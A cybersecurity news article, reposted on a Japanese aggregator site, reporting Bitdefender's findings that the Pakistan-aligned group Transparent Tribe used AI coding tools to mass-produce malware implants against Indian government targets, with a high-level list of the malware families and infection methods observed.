サイバーニュース.jp

世界のサイバーなニュースを配信

Transparent Tribe Uses AI to Mass-Produce Malware Implants in Campaign Targeting India

カテゴリ:

Transparent Tribe Embraces AI for Malware Production

Transparent Tribe, a Pakistan-aligned threat actor, has adopted artificial intelligence (AI)-powered coding tools to launch a campaign targeting India with various malware implants. According to Bitdefender, this shift is part of a broader trend towards AI-assisted malware industrialization, which allows the group to flood target environments with a high volume of disposable, polyglot binaries.

Approach and Tools

The campaign leverages lesser-known programming languages such as Nim, Zig, and Crystal, and relies on trusted services like Slack, Discord, Supabase, and Google Sheets to evade detection. This strategy, dubbed Distributed Denial of Detection (DDoD), aims to overwhelm standard defensive telemetry rather than bypassing detection through technical sophistication.

Targeting and Infection Vectors

The attacks primarily target the Indian government and its embassies, with APT36 using LinkedIn to identify high-value targets. Infection chains typically start with phishing emails containing Windows shortcuts (LNKs) within ZIP archives or ISO images, or PDF lures that redirect users to attacker-controlled websites for malware download.

Malware Families and Tools

Several malware families and tools have been observed in the attacks:

  • Warcode: A custom shellcode loader written in Crystal that deploys a Havoc agent.
  • NimShellcodeLoader: An experimental counterpart to Warcode that deploys a Cobalt Strike beacon.
  • CreepDropper: A .NET malware that delivers and installs additional payloads, including SHEETCREEP and MAILCREEP.
  • SupaServ: A Rust-based backdoor that uses Supabase and Firebase for communication.
  • LuminousStealer: A Rust-based infostealer that uses Firebase and Google Drive for data exfiltration.
  • CrystalShell: A backdoor written in Crystal that targets multiple operating systems and uses Discord for C2.
  • ZigShell: A counterpart to CrystalShell written in Zig, using Slack for C2.
  • CrystalFile: A command interpreter written in Crystal that executes commands from a monitored file.
  • LuminousCookies: A Rust-based injector that exfiltrates sensitive information from Chromium-based browsers.
  • BackupSpy: A Rust-based utility that monitors the local file system and external media for high-value data.
  • ZigLoader: A specialized loader written in Zig that decrypts and executes shellcode in memory.
  • Gate Sentinel Beacon: A customized version of the open-source GateSentinel C2 framework.

Implications and Countermeasures

Bitdefender warns that the threat posed by AI-assisted malware is the industrialization of attacks, enabling threat actors to scale their activities quickly and with less effort. The adoption of exotic programming languages and the abuse of trusted services to hide in legitimate network traffic are key factors in the success of these campaigns.

While AI-assisted development increases the volume of malware samples, the resulting tools are often unstable and riddled with logical errors, targeting signature-based detection which has been superseded by modern endpoint security.

元記事: https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html

投稿をさらに読み込む